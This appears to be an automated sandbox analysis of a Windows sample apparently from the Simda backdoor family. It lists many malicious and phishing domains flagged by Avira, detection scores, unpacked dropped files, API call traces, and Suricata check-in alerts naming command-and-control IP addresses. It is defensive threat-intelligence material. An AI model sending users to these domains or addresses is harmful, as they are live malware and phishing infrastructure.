Source: http://lyryvur.com/Avira URL Cloud: Label: malware
Source: http://purycap.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyfud.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyvuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowyrif.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyvuq.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qexyryl.com/Avira URL Cloud: Label: phishing
Source: http://qeqyxov.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowydef.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyvup.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexynyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97daAvira URL Cloud: Label: malware
Source: http://gaqycos.com/Avira URL Cloud: Label: malware
Source: http://qexyfuq.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryman.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyvax.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvymej.com/login.phpAvira URL Cloud: Label: malware
Source: http://vocyruk.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyryled.com/login.phpAvira URL Cloud: Label: malware
Source: http://galydyw.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofydac.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowyrym.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qekyhil.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacyhez.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojydoc.com/Avira URL Cloud: Label: malware
Source: http://pujycil.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygysij.com/login.phpAvira URL Cloud: Label: malware
Source: http://pufytip.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxywer.com/Avira URL Cloud: Label: malware
Source: http://lysytoj.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatykyh.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetykyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopykum.com/login.phpuAvira URL Cloud: Label: malware
Source: http://gadyniw.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedyfyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofypam.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupywyv.com/login.phpAvira URL Cloud: Label: phishing
Source: http://qegyval.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujyjup.com/http://purycul.com/http://lykyjux.com/http://pupyboq.com/http://qedynaq.com/http:Avira URL Cloud: Label: malware
Source: http://lyvymir.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyxux.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvynid.com/login.phpAvira URL Cloud: Label: malware
Source: https://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyfen.com/http://lykyfen.com/HAvira URL Cloud: Label: malware
Source: http://vojybim.com/login.phpAvira URL Cloud: Label: phishing
Source: http://puvymul.com/Avira URL Cloud: Label: malware
Source: http://galyhib.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganykaz.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetylyv.com/Avira URL Cloud: Label: phishing
Source: http://qegyfyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexyhuv.com/login.phpC:Avira URL Cloud: Label: malware
Source: http://lyxygax.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopykum.com/login.phpAvira URL Cloud: Label: malware
Source: http://puvymul.com/http://lyryled.com/http://lysyxux.com/0Avira URL Cloud: Label: malware
Source: http://lyxyxox.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedykiv.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzylol.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lymywaj.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyquk.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywoq.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyjif.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyxip.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:Avira URL Cloud: Label: malware
Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyvuh.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyxiv.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryled.com/Avira URL Cloud: Label: malware
Source: http://lymysan.com/login.phpAvira URL Cloud: Label: phishing
Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
Source: http://volycem.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxysad.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacyzuz.com/login.phpAvira URL Cloud: Label: phishing
Source: http://gahyzez.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywyl.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojycec.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyzic.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojydam.com/login.phpAvira URL Cloud: Label: malware
Source: http://pufybyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzylyp.com/Avira URL Cloud: Label: malware
Source: http://lyvyjox.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyxux.com/Avira URL Cloud: Label: malware
Source: http://lyrytun.com/login.phpAvira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted file
Source: WlCVLbzNph.exeReversingLabs: Detection: 84%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
Machine Learning detection for sample
Source: WlCVLbzNph.exeJoe Sandbox ML: detected

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeUnpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: WlCVLbzNph.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61823 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53540 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53543 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53554 version: TLS 1.2
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2700878019.0000000007C3B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPtwtzGyOdAtB.exe, 00000005.00000002.1934683866.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000002.1935101220.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1817445370.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000D.00000002.1935586278.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000F.00000000.1852775945.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1881079746.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000016.00000000.1879737054.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000019.00000000.1898777983.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001C.00000002.1914742299.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001E.00000002.2019539381.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000020.00000002.2050100961.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000023.00000002.2052551913.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989138523.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000003.2567509191.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01437CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01437CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,5_2_0143BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_014166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013A7CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_013A7CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013ABE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_013ABE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013866D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013866D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,10_2_0323BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,10_2_032166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03237CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,10_2_03237CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49716 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49719 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49712 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49715 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:53944
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49722 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49713 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49706 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49709 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49710 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49711 -> 208.100.26.245:80
